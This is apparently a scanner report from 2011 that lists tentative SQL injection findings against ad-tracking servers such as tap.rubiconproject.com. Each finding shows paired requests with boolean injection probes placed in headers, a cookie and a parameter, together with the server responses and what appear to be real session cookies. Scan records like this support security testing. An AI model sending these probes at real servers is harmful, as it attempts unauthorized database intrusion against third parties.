Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 16 Jun 2011 11:16:09 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 3683
Connection: keep-alive

ot_d=document;ot_un="undefined";
if(typeof otgoal!==ot_un){ot_goal=escape(otgoal);if(ot_goal.indexOf('%u')!=-1)ot_goal=escape(ot_goal);ot_goal='&otgoal='+ot_goal;}else ot_goal='';
if(typeof otclv!==ot_un)ot_clv='&otclv='+otclv;else ot_clv='';
ot_b="http"+(ot_d.URL.indexOf('https:')==0?'s://':'://')+'a02.opentracker.net';
if(typeof(top.document)=="object") ot_r=top.document;else ot_r=ot_d;
ot_c=ot_r;
ot_cd=(new Date("December 31, 2023")).toGMTString();ot_cld=new Date();ot_fv=false;ot_ac=false;
if (typeof ot_ti===ot_un) {
ot_ti=ot_d.title;
}
ot_ti=escape(ot_ti);if (ot_ti.indexOf('%u')!=-1) ot_ti=escape(ot_ti);
ot_mj=parseInt(navigator.appVersion);if(ot_mj>=5){if(ot_d.referrer.indexOf(ot_r.location.hostname)==-1)ot_r=ot_d;}else{ot_r=document;}
if(ot_c.cookie.indexOf('machine-id')!=-1)ot_ac=true;else{
if(ot_c.cookie.indexOf('machine-id')==-1) f_sc("machine-id","173.193.214.243:1308222969806",ot_cd,"/");
if(ot_c.cookie.indexOf('machine-id')!=-1)ot_ac=true;
}
ot_rc=f_rc("machine-id");ot_lc=escape((typeof ot_url===ot_un)?ot_d.location:ot_url);ot_t0=1308222969806;

function f_log() {
ot_im=new Image(1,1);
ot_im.src=ot_b+'/collect.jsp?p=1&mid='+ot_rc
+'&fv='+ot_fv+'&ti='+ot_ti+'&si=nicusa.com18703088' or 1=1-- '
+ot_goal+ot_clv
+'&sh='+screen.height+'&sw='+screen.width
+'&sc='+screen.pixelDepth+ot_goal+ot_clv
+'&lc='+ot_lc+'&ref='+escape(ot_r.referrer)
+'&t0='+ot_t0;
}

function f_sc(n,v,h,p,d,s){
ot_fv=true;ot_c.cookie=n+'='+escape(v)+((h)?(';expires='+h):'')+((p)?';path='+p:'')+((d)?';domain='+d:'')+((s && (s==true))?'; secure':'');
}

function f_rc(n){
if(ot_c.cookie=='')return false;else{
var fc,lc;var tbc=ot_c.cookie;fc=tbc.indexOf(n);var NN2Hack=fc+n.length;
if((fc != -1) && (tbc.charAt(NN2Hack)=='=')){
fc += n.length+1;lc=tbc.indexOf(';',fc);
if(lc==-1)lc=tbc.length;return unescape(tbc.substring(fc,lc));
}else{return false;}
}
}

function ot_f(e) {
et=e.target;
ot_o=et;
if (ot_o.caught==true)
...[SNIP]...

Request 2

GET /?site=nicusa.com18703088'%20or%201%3d2--%20 HTTP/1.1
Host: script.footprintlive.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 16 Jun 2011 11:16:10 GMT
Server: Apache-Coyote/1.1
Content-Length: 1
Connection: keep-alive

1.15. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,please+respect:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+42:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=21|4|17|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%262374%3D1; rdk2=0; ses2=11953^6; csi2=3187870.js^5^1308226504^1308228061&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^11; csi15=3187871.js^8^1308225219^1308228064&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:14:02 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:14:02 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:14:02 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,please+respect:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+42:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=21|4|17|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%262374%3D1; rdk2=0; ses2=11953^6; csi2=3187870.js^5^1308226504^1308228061&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^11; csi15=3187871.js^8^1308225219^1308228064&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:14:02 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.16. http://tap.rubiconproject.com/oz/sensor [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=87&k=southern+union:328,energy+transfer:288,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:122,energy:112,billion+cnbc:80,southern:72,transfer:72,datetime+11:72,union:72,must+click:64,please+respect:64,cnbc+welcomes:64,cnbc+reserves:64,posted+yet:64,cnbc+highlights:64,related+links:64,2011:56,asia+pacific:56,datetime+6:48,2011+11:48,16+2011:48,11+06:48,6+16:48,special+reports:48,expiration+datetime:48,datetime:46,billion:46,energy+news:40,burgeoning+u:40,union+company:40,will+buy:40,transfer+equity:40,large+midstream:40,midstream+company:40,will+benefit:40,transfer+partners:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24'%20and%201%3d1--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; cd=false; dq=75|4|71|0; csi2=1300433.js^27^1308237983^1308247606&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; csi15=1300434.js^29^1308237982^1308247605&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; ses2=11953^63; rdk=6451/11953; ses15=11953^72

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 18:07:58 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 18:06:06 GMT; Path=/
Set-Cookie: dq=77|4|73|0; Expires=Fri, 15-Jun-2012 18:06:06 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=87&k=southern+union:328,energy+transfer:288,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:122,energy:112,billion+cnbc:80,southern:72,transfer:72,datetime+11:72,union:72,must+click:64,please+respect:64,cnbc+welcomes:64,cnbc+reserves:64,posted+yet:64,cnbc+highlights:64,related+links:64,2011:56,asia+pacific:56,datetime+6:48,2011+11:48,16+2011:48,11+06:48,6+16:48,special+reports:48,expiration+datetime:48,datetime:46,billion:46,energy+news:40,burgeoning+u:40,union+company:40,will+buy:40,transfer+equity:40,large+midstream:40,midstream+company:40,will+benefit:40,transfer+partners:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24'%20and%201%3d2--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; cd=false; dq=75|4|71|0; csi2=1300433.js^27^1308237983^1308247606&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; csi15=1300434.js^29^1308237982^1308247605&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; ses2=11953^63; rdk=6451/11953; ses15=11953^72

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 18:07:58 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.17. http://tap.rubiconproject.com/oz/sensor [cd cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false'%20and%201%3d1--%20; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:10:17 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:10:17 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:10:17 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false'%20and%201%3d2--%20; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:10:17 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.18. http://tap.rubiconproject.com/oz/sensor [cd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 12779497'%20or%201%3d1--%20 and 12779497'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false12779497'%20or%201%3d1--%20&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
